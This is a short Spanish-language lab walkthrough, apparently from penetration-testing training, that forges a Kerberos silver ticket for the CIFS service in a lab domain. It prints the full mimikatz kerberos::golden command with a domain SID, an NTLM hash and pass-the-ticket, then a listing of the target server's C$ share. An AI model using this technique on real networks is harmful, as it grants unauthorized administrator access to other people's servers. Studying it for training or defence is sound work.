En la evidencia previa, se puede apreciar que NO tenemos visibilidad contra el servidor USER-SERVER.spartancybersec.corp desde WEBSERVER.spartancybersec.corp
Vamos a generar un silver ticket para el servicio de CIFS y para ello es necesario:
SID del dominio
HASH NTLM DE USER-SERVER
El comando seria el siguiente:
C:\Users\Public\TOOLS>mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )## \ / ## > https://blog.gentilkiwi.com/mimikatz'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )'#####'> https://pingcastle.com/ https://mysmartlogon.com***/mimikatz # kerberos::golden /user:Administrator /domain:spartancybersec.corp /sid:S-1-5-21-1861162130-2580302541-221646211 /target:USER-SERVER.spartancybersec.corp /rc4:dadef894e564c991a5a5714e0a7efc67 /service:CIFS /ptt
User : AdministratorDomain : spartancybersec.corp (SPARTANCYBERSEC)SID : S-1-5-21-1861162130-2580302541-221646211User Id : 500Groups Id : *513512520518519ServiceKey: dadef894e564c991a5a5714e0a7efc67 - rc4_hmac_ntService : CIFSTarget : USER-SERVER.spartancybersec.corpLifetime : 11/23/20237:14:27 PM ; 11/20/20337:14:27 PM ; 11/20/20337:14:27 PM-> Ticket : ** Pass The Ticket *** PAC generated* PAC signed* EncTicketPart generated* EncTicketPart encrypted* KrbCred generatedGolden ticket for'Administrator @ spartancybersec.corp' successfully submitted for current sessionmimikatz # exitBye!
Despues de lo anterior, podemos validar la existencia de nuestro ticket asi:
Y como resultado final podremos realizar una interaccion exitosa:
C:\Users\Public\TOOLS>dir \\USER-SERVER.spartancybersec.corp\c$ Volume in drive \\USER-SERVER.spartancybersec.corp\c$ has no label. Volume Serial Number is 4C79-B015 Directory of \\USER-SERVER.spartancybersec.corp\c$11/14/201806:56 AM <DIR> EFI05/13/202005:58 PM <DIR> PerfLogs09/24/202203:51 AM <DIR> Program Files09/19/202211:44 PM <DIR> Program Files (x86)11/23/202307:10 PM <DIR> Users11/13/202309:11 AM <DIR> Windows0 File(s) 0 bytes6 Dir(s) 14,095,360,000 bytes free